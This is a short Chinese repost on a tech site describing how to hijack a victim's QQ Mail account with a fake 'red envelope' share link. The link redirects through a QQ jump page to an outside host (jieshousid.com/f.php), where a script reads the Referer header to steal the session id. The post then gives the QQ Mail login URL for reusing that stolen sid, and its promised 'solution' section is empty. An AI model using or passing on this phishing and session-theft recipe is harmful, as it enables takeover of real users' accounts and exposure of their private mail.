我是如何发一个“红包”就控制别人的QQ的(以QQ邮箱作为演示/无需xss)
https://connect.qq.com/widget/shareqq/index.html?url=https://jump.qt.qq.com/php/jump/check_url/?url=https://jieshousid.com/f.php&desc=&title=&summary=&pics=https://mqq-imgcache.gtimg.cn/res/mqq/hongbao/img/message_logo_100.png&flash=&site=&style=201&width=32&height=32
这个可以自行构造更具诱惑的链接
如:
脚本f.php
$_SERVER['HTTP_REFERER'];
获取Referer
得到sid 构造如下链接即可进入qq邮箱:
https://w.mail.qq.com/cgi-bin/login?3g_sid=获取到的sid&3g_style=1&fun=from3g
解决方案:
—-想了解更多的网站安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>
本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。
ctvol管理联系方式QQ:251552304
本文章地址:https://www.ctvol.com/webstt/websy/95457.html